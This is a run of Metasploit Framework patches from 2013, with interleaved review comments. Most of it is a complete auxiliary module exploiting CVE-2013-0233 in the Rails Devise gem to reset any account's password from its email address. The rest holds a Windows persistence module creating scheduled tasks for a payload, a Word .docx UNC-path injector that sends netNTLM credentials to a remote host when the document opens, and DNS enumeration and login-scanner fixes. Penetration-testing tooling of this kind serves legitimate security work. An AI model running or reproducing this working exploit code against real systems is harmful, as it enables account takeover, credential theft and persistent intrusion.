+ # Returns altered XML + + def create_trigger_tags(trig, xml) + domain, user = client.sys.config.getuid.split('\\') + + # Create session state trigger, weird spacing used to maintain + # natural Winadows spacing for XML export + temp_xml = "<SessionStateChangeTrigger>\n" + temp_xml << " #{create_expire_tag}" if not datastore['EXPIRE_TIME'] + temp_xml << " <Enabled>true</Enabled>\n" + temp_xml << " <StateChange>#{trig}</StateChange>\n" + temp_xml << " <UserId>#{domain}\\#{user}</UserId>\n" + temp_xml << " </SessionStateChangeTrigger>" + + xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml) + + return xml + end + + ############################################################## + # Creates trigger XML for event based triggers and replaces + # the time trigger. + # Returns altered XML + + def create_trigger_event_tags(log, line, xml) + # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind + # used to maintain natural Windows spacing for XML export + temp_xml = "<EventTrigger>\n" + temp_xml << " #{create_expire_tag}\n" if not datastore['EXPIRE_TIME'] + temp_xml << " <Enabled>true</Enabled>\n" + temp_xml << " <Subscription><QueryList><Query Id=\"0\" " + temp_xml << "Path=\"#{log}\"><Select Path=\"#{log}\">" + temp_xml << line + temp_xml << "</Select></Query></QueryList>" + temp_xml << "</Subscription>\n" + temp_xml << " </EventTrigger>" + + xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml) + return xml + end + + ############################################################## + # Takes the XML and a path and writes file to filesystem + # Returns boolean for success + + def write_xml(xml, path) + begin + if file? 
path + print_error("File #{path} already exists...exiting") + return false + end + fd = session.fs.file.new(path, "wb") + fd.write(xml) + fd.close + rescue + print_error("Issues writing XML to #{path}") + return false + end + print_status("Successfully wrote XML file to #{path}") + return true + end + + ############################################################## + # Takes path and delete file + # Returns boolean for success + + def delete_file(path) + begin + session.fs.file.rm(path) + rescue + print_warning("Could not delete file #{path}, delete manually") + return false + end + return true + end + + ############################################################## + # Takes path and name for task and creates final task + # Returns boolean for success + + def create_task(path, schname, rexe_path) + # create task using XML file on victim fs + create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"") + if create_task_response =~ /has successfully been created/ + print_good("Persistence task #{schname} created successfully") + + # Create to delete commands for exe and task + del_task = "schtasks /delete /tn \"#{schname}\" /f" + print_status("#{"To delete task:".ljust(20)} #{del_task}") + print_status("#{"To delete payload:".ljust(20)} del #{rexe_path}") + del_task << "\ndel #{rexe_path}" + + # Delete XML from victim + delete_file(path) + + # Save info to notes DB + report_note(:host => session.session_host, + :type => "host.s4u_persistance.cleanup", + :data => { + :session_num => session.sid, + :stype => session.type, + :desc => session.info, + :platform => session.platform, + :via_payload => session.via_payload, + :via_exploit => session.via_exploit, + :created_at => Time.now.utc, + :delete_commands => del_task + } + ) + return true + elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ + print_error("The scheduled task name is already in use") + # Clean up + delete_file(rexe_path) + 
delete_file(path) + else + print_error("Issues creating task using XML file schtasks") + vprint_error("Error: #{create_task_response}") + if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event" + print_warning("Security log can restricted by UAC, try a different trigger") + end + # Clean up + delete_file(rexe_path) + delete_file(path) + return false + end + end +end \ No newline at end of file From 55cba56591fc7befd7d71197a84b9433c67f3780 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 10 Feb 2013 21:10:00 -0600 Subject: [PATCH 341/421] Aux module for joernchen's devise vuln - CVE-2013-0233 --- .../admin/http/rails_devise_pass_reset.rb | 139 ++++++++++++++++++ 1 file changed, 139 insertions(+) create mode 100644 modules/auxiliary/admin/http/rails_devise_pass_reset.rb diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb new file mode 100644 index 000000000000..48ae2186ad10 --- /dev/null +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb 
@@ -0,0 +1,139 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Rails Devise authentication gem Password Reset', + 'Description' => %q{ + The Devise authentication gem for Ruby on Rails is vulnerable + to a password reset exploit leveraging type confusion. By submitting XML + to rails, we can influence the type used for the reset_password_token + parameter. This allows for resetting passwords of arbitrary accounts, + knowing only the associated email address. + + This module defaults to the most common devise URIs and response values, + but these may require adjustment for implementations which customize them. + + Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database + except PostgreSQL or SQLite3. + + Tested w/ v2.2.2, 2.1.2, and 2.0.4. 
+ }, + 'Author' => + [ + 'joernchen', #original discovery and disclosure + 'jjarmoc', #metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', 'CVE-2013-0233'], + [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], + [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], + ], + 'DisclosureDate' => 'Jan 28 2013' + )) + + register_options( + [ + OptString.new('URIPATH', [ true, "The request URI", '/users/password']), + OptString.new('TARGETEMAIL', [true, "The Email address of target account", '']), + OptString.new('PASSWORD', [true, 'The password to set', "#{Rex::Text.rand_text_alpha(rand(10) + 5)}"]), + OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), + OptInt.new('MAXINT', [true, "Max integer to try (Tokens begining with a higher int will fail)", 10]) + ], self.class) + end + + def generate_token(account) + # CSRF token from GET "/users/password/new" isn't actually validated it seems. 
+ + print_status("Generating reset token for #{account}") + + postdata="user[email]=#{account}" + + res = send_request_cgi({ + 'uri' => datastore['URIPATH'], + 'method' => 'POST', + 'data' => postdata, + }) + end + + def clear_tokens() + print_status("Clearing existing tokens") + count = 0 + status = true + until (status == false) do + status = reset_one(Rex::Text.rand_text_alpha(rand(10) + 5)) + count += 1 if status + end + print_status("Cleared #{count} tokens") + end + + def reset_one(password, report=false) + print_status("Resetting password to \"#{datastore['PASSWORD']}\"") if report + + (0..datastore['MAXINT']).each{ |int_to_try| + xml = "" + xml << "<user>" + xml << "<password>#{password}</password>" + xml << "<password_confirmation>#{password}</password_confirmation>" + xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>" + xml << "</user>" + + res = send_request_cgi({ + 'uri' => datastore['URIPATH'] || "/", + 'method' => 'PUT', + 'ctype' => 'application/xml', + 'data' => xml, + }) + + #binding.pry if report + + case res.code + when 200 + # Failure, grab the error text + # May need to tweak this for some apps... + error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] + if (report) && (error_text !~ /token/) + print_error("Server returned an error:") + print_error(error_text) + return false + end + when 302 + #Success! + return true + else + print_error("ERROR: received code #{res.code}") + return false + end + } + + print_error("No active reset tokens below #{datastore['MAXINT']} remain. + Try a higher MAXINT.") if report + return false + + end + + def run + # Clear outstanding reset tokens, helps ensure we hit the intended account. + clear_tokens() if datastore['FLUSHTOKENS'] + + # Generate a token for our account + generate_token(datastore['TARGETEMAIL']) + + # Reset a password. We're racing users creating other reset tokens. 
+ # If we didn't flush, we'll reset the account with the lowest ID that has a token. + status = reset_one(datastore['PASSWORD'], true) + status ? print_good("Success") : print_error("Failed") + end +end \ No newline at end of file From 43a1fbb6f29b783742ac79ff055d6e0783d3797f Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 10 Feb 2013 21:13:18 -0600 Subject: [PATCH 342/421] Make msftiday happy. --- .../auxiliary/admin/http/rails_devise_pass_reset.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 48ae2186ad10..c249f96d5c71 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -13,12 +13,12 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Rails Devise authentication gem Password Reset', + 'Name' => 'Rails Devise Authentication Gem Password Reset', 'Description' => %q{ The Devise authentication gem for Ruby on Rails is vulnerable - to a password reset exploit leveraging type confusion. By submitting XML + to a password reset exploit leveraging type confusion. By submitting XML to rails, we can influence the type used for the reset_password_token - parameter. This allows for resetting passwords of arbitrary accounts, + parameter. This allows for resetting passwords of arbitrary accounts, knowing only the associated email address. This module defaults to the most common devise URIs and response values, @@ -37,7 +37,7 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', 'CVE-2013-0233'], + [ 'CVE', '2013-0233'], [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], ], 
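Review bot: In `reset_one` of the new rails_devise_pass_reset.rb, `case res.code` runs without checking that `send_request_cgi` returned a response, so a timeout or refused connection (where `res` is presumably nil) raises NoMethodError inside the loop instead of taking the module's own error path. A guard before the `case`, `unless res; print_error("No response from server"); return false; end`, keeps that failure consistent with the other branches. `generate_token` assigns `res` and never inspects it, so `run` carries on even when the token request failed. The FLUSHTOKENS help text could also say that flushing works by setting a random password on every account that has a pending token, because that side effect on other accounts is only visible by reading `clear_tokens`.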
@@ -99,7 +99,7 @@ def reset_one(password, report=false) #binding.pry if report - case res.code + case res.code when 200 # Failure, grab the error text # May need to tweak this for some apps... @@ -112,7 +112,7 @@ def reset_one(password, report=false) when 302 #Success! return true - else + else print_error("ERROR: received code #{res.code}") return false end From 991e65770c165f8bde901e335968cbdefc5171a2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 11 Feb 2013 15:06:19 +0100 Subject: [PATCH 343/421] minor cleanup for word_unc_injector --- modules/auxiliary/docx/word_unc_injector.rb | 52 +++++++++++---------- 1 file changed, 28 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 3ee9bb93dab3..2d03d0a59624 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb 
@@ -17,30 +17,30 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Word UNC Path Injector', 'Description' => %q{ - This module modifies a .docx file that will, upon opening, submit all - stored netNTLM credentials to a remote host. It can also create an empty docx file. - If emailed the receiver needs to put the document in editing mode - before the remote server will be contacted. Preview and read-only - mode do not work. Verified to work with Microsoft Word 2003, - 2007 and 2010 as of January 2013 date by using auxiliary/server/capture/smb + This module modifies a .docx file that will, upon opening, submit stored + netNTLM credentials to a remote host. It can also create an empty docx file. If + emailed the receiver needs to put the document in editing mode before the remote + server will be contacted. Preview and read-only mode do not work. Verified to work + with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the + hashes the auxiliary/server/capture/smb module can be used. }, 'License' => MSF_LICENSE, 'References' => - [ - [ 'URL', 'http://jedicorp.com/?p=534' ], - ], + [ + [ 'URL', 'http://jedicorp.com/?p=534' ] + ], 'Author' => - [ - 'SphaZ <cyberphaz[at]gmail.com>' - ] + [ + 'SphaZ <cyberphaz[at]gmail.com>' + ] )) register_options( [ - OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']), - OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), - OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']), - OptString.new('DOCAUTHOR',[false,'Document author for empty document.', '']), + OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.']), + OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. 
If empty, creates new document.']), + OptString.new('FILENAME', [true, 'Document output filename.', 'msf.docx']), + OptString.new('DOCAUTHOR',[false,'Document author for empty document.']), ], self.class) end @@ -59,24 +59,26 @@ def make_new_file #where to find the skeleton files required for creating an empty document data_dir = File.join(Msf::Config.install_root, "data", "exploits", "docx") - #making the actual docx - docx = Rex::Zip::Archive.new + zip_data = {} + #add skeleton files vprint_status("Adding skeleton files from #{data_dir}") Dir["#{data_dir}/**/**"].each do |file| if not File.directory?(file) - docx.add_file(file.sub(data_dir,''), File.read(file)) + zip_data[file.sub(data_dir,'')] = File.read(file) end end + #add on-the-fly created documents vprint_status("Adding injected files") - docx.add_file("docProps/core.xml", metadata_file_data) - docx.add_file("word/_rels/settings.xml.rels", @rels_file_data) + zip_data["docProps/core.xml"] = metadata_file_data + zip_data["word/_rels/settings.xml.rels"] = @rels_file_data + #add the otherwise skipped "hidden" file file = "#{data_dir}/_rels/.rels" - docx.add_file(file.sub(data_dir,''), File.read(file)) + zip_data[file.sub(data_dir,'')] = File.read(file) #and lets create the file - file_create(docx.pack) + zip_docx(zip_data) end #here we inject an UNC path into an existing file, and store the injected file in FILENAME @@ -177,7 +179,9 @@ def run else #extract the word/settings.xml and edit in the reference we need print_status("Injecting UNC path into existing document.") - if not manipulate_file.nil? + if manipulate_file.nil? + print_error("Failed to create a document from #{datastore['SOURCE']}.") + else print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.") end end From 24c3f1b99d6375f535d801cdd151639b07cd5dfd Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 11 Feb 2013 15:07:49 +0100 Subject: [PATCH 344/421] fix msftidy --- modules/auxiliary/docx/word_unc_injector.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 2d03d0a59624..926af2a6d39a 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -84,7 +84,7 @@ def make_new_file #here we inject an UNC path into an existing file, and store the injected file in FILENAME def manipulate_file ref = "<w:attachedTemplate r:id=\"rId1\"/>" - + if not File.stat(datastore['SOURCE']).readable? print_error("Not enough rights to read the file. Aborting.") return nil From 55efe01bf7874782fe0923af16b1fb2a273b271b Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 11:23:06 -0400 Subject: [PATCH 345/421] Applied fixes --- modules/auxiliary/gather/dns_info.rb | 30 +++++++++++++++++++--------- 1 file changed, 21 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index f57fb1649f2a..ce13243377ee 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb 
@@ -40,18 +40,23 @@ def initialize(info = {}) def run print_status("Enumerating #{datastore['DOMAIN']}") @res = Net::DNS::Resolver.new() - @res.retry = datastore['RETRY'].to_i - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + + if datastore['RETRY'] + @res.retry = datastore['RETRY'].to_i + end + + if datastore['RETRY_INTERVAL'] + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + end + wildcard(datastore['DOMAIN']) switchdns() if not datastore['NS'].nil? - # Get A and AAAA Records for the domain get_ip(datastore['DOMAIN']).each do |r| print_good("#{r[:host]} #{r[:address]} #{r[:type]}") report_host(:host => r[:address]) end - # Get Name Servers get_ns(datastore['DOMAIN']).each do |r| print_good("#{r[:host]} #{r[:address]} #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) @@ -63,13 +68,11 @@ def run ) end - # Get SOA get_soa(datastore['DOMAIN']).each do |r| print_good("#{r[:host]} #{r[:address]} #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) end - #Get MX get_mx(datastore['DOMAIN']).each do |r| print_good("#{r[:host]} #{r[:address]} #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) @@ -81,10 +84,12 @@ def run ) end - # Get TX get_txt(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") - report_host(:host => r[:address], :name => r[:host]) + report_note(:host => datastore['DOMAIN'], + :proto => 'UDP', + :port => 53, + :type => 'dns.info', + :data => {:text => r[:text]}) end end @@ -175,12 +180,19 @@ def get_soa(target) #--------------------------------------------------------------------------------- def get_txt(target) + results = [] query = @res.query(target, "TXT") if (query) query.answer.each do |rr| + record = {} print_good("Text: #{rr.txt}, TXT") + record[:host] = target + record[:text] = rr.txt + record[:type] = "TXT" + results << record end end + return results end #--------------------------------------------------------------------------------- 
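Review bot: `get_txt` still prints each record itself with `print_good("Text: #{rr.txt}, TXT")` while now also returning it, whereas `run` does the printing for the A, NS, SOA and MX results; moving the print into the `get_txt(...).each` loop in `run` would leave the helper free of output. The `:host` and `:type` keys are filled in but the new loop reads only `r[:text]`, so the record can be built as one literal, `results << { :host => target, :text => rr.txt, :type => "TXT" }`, or trimmed to what is used. In the new `report_note` call `:host` receives the domain name from the datastore, unlike the `report_host` calls above it that pass `r[:address]`; it is worth confirming the reporting layer accepts a name there. `run` starts and ends outside these hunks.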
From 5f107046973def335d690497c048ca4622ce2649 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 11:31:13 -0400 Subject: [PATCH 346/421] applied fixes --- modules/auxiliary/gather/dns_reverse_lookup.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index e3e28342a678..cc102b92350a 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -33,14 +33,21 @@ def initialize(info = {}) [ OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), - OptInt.new('THREADS', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('THREADS', [ true, "Number of seconds to wait before doing a retry", 2]), ], self.class) end def run @res = Net::DNS::Resolver.new() - @res.retry = datastore['RETRY'].to_i - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + + if datastore['RETRY'] + @res.retry = datastore['RETRY'].to_i + end + + if datastore['RETRY_INTERVAL'] + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + end + @threadnum = datastore['THREADS'].to_i switchdns() if not datastore['NS'].nil? reverselkp(datastore['RANGE']) @@ -72,7 +79,6 @@ def reverselkp(iprange) rescue ::Rex::ConnectionError rescue ::Exception => e print_error("Error: #{tip}: #{e.message}") - elog("Error running against host #{tip}: #{e.message}\n#{e.backtrace.join("\n")}") end end end From fd6f00f641e3a2e3d3b9cac459fe592ea394882f Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 11:37:20 -0400 Subject: [PATCH 347/421] added report note for wildcard --- modules/auxiliary/gather/dns_info.rb | 5 +++++ 1 file changed, 5 insertions(+) 
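Review bot: The THREADS option keeps the help text copied from RETRY_INTERVAL, "Number of seconds to wait before doing a retry", even though this hunk edits that very line to make the option required and `run` stores the value in `@threadnum`. The description should say what the value controls, for example `OptInt.new('THREADS', [ true, "Number of concurrent lookup threads", 2]),` (wording to be confirmed against how `@threadnum` is used in `reverselkp`, which is outside the hunk). `run` continues past the end of the hunk.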
diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index ce13243377ee..a6f0ff2b80bd 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -101,6 +101,11 @@ def wildcard(target) print_status("This Domain has Wildcards Enabled!!") query.answer.each do |rr| print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + report_note(:host => datastore['DOMAIN'], + :proto => 'UDP', + :port => 53, + :type => 'dns.wildcard', + :data => "Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") end return true else From 5edb138a8f370f033723e6202d3912c104ad921e Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 11:51:33 -0400 Subject: [PATCH 348/421] fixed nil issue --- modules/exploits/windows/local/persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 386d6900de4f..126b94e3f596 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -163,7 +163,7 @@ def log_file(log_path = nil) #------------------------------------------------------------------------------- def write_script_to_target(vbs,name) tempdir = session.fs.file.expand_path("%TEMP%") - if name + if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else tempvbs = tempdir + "\\" + name + ".vbs" From 431641fec9cfcdede80fa543d7d921cff81a5f52 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 12:02:15 -0400 Subject: [PATCH 349/421] added check for retry options --- modules/auxiliary/gather/dns_srv.rb | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) 
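Review bot: The added `report_note` in `wildcard` runs for every answer record, but only the `print_status` above it carries the `if rr.class != Net::DNS::RR::CNAME` modifier, so a CNAME answer reaches `rr.address.to_s` in the `:data` string unguarded. If CNAME records do not respond to `address`, which the existing guard suggests, that raises inside the loop. Putting `next if rr.class == Net::DNS::RR::CNAME` at the top of the block covers both statements with one check. `wildcard` starts and ends outside the hunk.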
diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index 4bbccba51835..71f95c161dc9 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -38,8 +38,13 @@ def initialize(info = {}) def run records = [] @res = Net::DNS::Resolver.new() - @res.retry = datastore['RETRY'].to_i - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + if datastore['RETRY'] + @res.retry = datastore['RETRY'].to_i + end + + if datastore['RETRY_INTERVAL'] + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + end print_status("Enumerating SRV Records for #{datastore['DOMAIN']}") records = records + srvqry(datastore['DOMAIN']) From 6c85e5242e6285f3a76b14c24fa85a59b6288fd2 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 12:04:30 -0400 Subject: [PATCH 350/421] change wildcard message to print_warning --- modules/auxiliary/gather/dns_bruteforce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 0c289eddb3a9..070c32f0cca3 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -57,7 +57,7 @@ def wildcard(target) if query.answer.length != 0 print_status("This Domain has Wildcards Enabled!!") query.answer.each do |rr| - print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + print_warning("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME end return true else From 84534caae167697a6930776a0fdf9c0d5243f40a Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 11 Feb 2013 10:32:44 -0600 Subject: [PATCH 351/421] Fix expliciti basic_auth for http --- lib/rex/proto/http/client.rb | 5 +++++ 1 file changed, 5 insertions(+) 
diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 760268a7f78e..41adf30aedce 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -239,6 +239,7 @@ def request_raw(opts={}) # @return [Request] def request_cgi(opts={}) c_ag = opts['agent'] || config['agent'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' c_body = opts['data'] || '' c_cgi = opts['uri'] || '/' c_conn = opts['connection'] @@ -313,6 +314,10 @@ def request_cgi(opts={}) req << set_host_header(c_host) req << set_agent_header(c_ag) + if (c_auth.length > 0) + req << set_basic_auth_header(c_auth) + end + req << set_cookie_header(c_cook) req << set_connection_header(c_conn) req << set_extra_headers(c_head) From e72dc47448a7747e347d3a3715ac7657d96592b4 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 11:12:29 -0600 Subject: [PATCH 352/421] Uses REXML for encoding of password. --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index c249f96d5c71..b902b6d7a97a 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'rexml/element' class Metasploit3 < Msf::Auxiliary 
@@ -80,13 +81,15 @@ def clear_tokens() end def reset_one(password, report=false) - print_status("Resetting password to \"#{datastore['PASSWORD']}\"") if report + print_status("Resetting password to \"#{password}\"") if report (0..datastore['MAXINT']).each{ |int_to_try| + encode_pass = REXML::Text.new(password).to_s + xml = "" xml << "<user>" - xml << "<password>#{password}</password>" - xml << "<password_confirmation>#{password}</password_confirmation>" + xml << "<password>#{xmlpass}</password>" + xml << "<password_confirmation>#{encode_pass}</password_confirmation>" xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>" xml << "</user>" From 61ffcedbfd64fd6d190a6d92f4f0265e757463de Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 11:17:26 -0600 Subject: [PATCH 353/421] Address HD's other comments, fixes mismatched var name in last commit. --- .../auxiliary/admin/http/rails_devise_pass_reset.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index b902b6d7a97a..ac2a3d894203 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Rails Devise Authentication Gem Password Reset', + 'Name' => 'Ruby on Rails Devise Authentication Password Reset', 'Description' => %q{ The Devise authentication gem for Ruby on Rails is vulnerable to a password reset exploit leveraging type confusion. By submitting XML 
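Review bot: `xml << "<password>#{xmlpass}</password>"` interpolates `xmlpass`, which is not defined anywhere in this hunk; the escaped value is assigned to `encode_pass` a few lines earlier, so the line would raise NameError on the first iteration and should read `xml << "<password>#{encode_pass}</password>"`. `encode_pass` does not depend on `int_to_try`, so `encode_pass = REXML::Text.new(password).to_s` can be computed once before the `(0..datastore['MAXINT']).each` loop. The file requires `rexml/element` while the code uses `REXML::Text`; requiring `rexml/text` states the dependency directly. `reset_one` continues past the end of the hunk.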
@@ -48,10 +48,10 @@ def initialize(info = {}) register_options( [ OptString.new('URIPATH', [ true, "The request URI", '/users/password']), - OptString.new('TARGETEMAIL', [true, "The Email address of target account", '']), - OptString.new('PASSWORD', [true, 'The password to set', "#{Rex::Text.rand_text_alpha(rand(10) + 5)}"]), + OptString.new('TARGETEMAIL', [true, "The email address of target account"]), + OptString.new('PASSWORD', [true, 'The password to set']), OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), - OptInt.new('MAXINT', [true, "Max integer to try (Tokens begining with a higher int will fail)", 10]) + OptInt.new('MAXINT', [true, "Max integer to try (tokens begining with a higher int will fail)", 10]) ], self.class) end @@ -88,7 +88,7 @@ def reset_one(password, report=false) xml = "" xml << "<user>" - xml << "<password>#{xmlpass}</password>" + xml << "<password>#{encode_pass}</password>" xml << "<password_confirmation>#{encode_pass}</password_confirmation>" xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>" xml << "</user>" From a43b902b5cb163df1b9040e6eda31f031b0e9d75 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 11 Feb 2013 12:00:40 -0600 Subject: [PATCH 354/421] Fix tomcat_mgr_login auth --- modules/auxiliary/scanner/http/tomcat_mgr_login.rb | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 65ab691e66dd..75f88e7ed3db 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -87,10 +87,6 @@ def run_host(ip) vprint_error("http://#{rhost}:#{rport}#{uri} - No response") return end - if res.code != 401 - vprint_error("http://#{rhost}:#{rport} - Authorization not requested") - return - end each_user_pass { |user, pass| do_login(user, pass) 
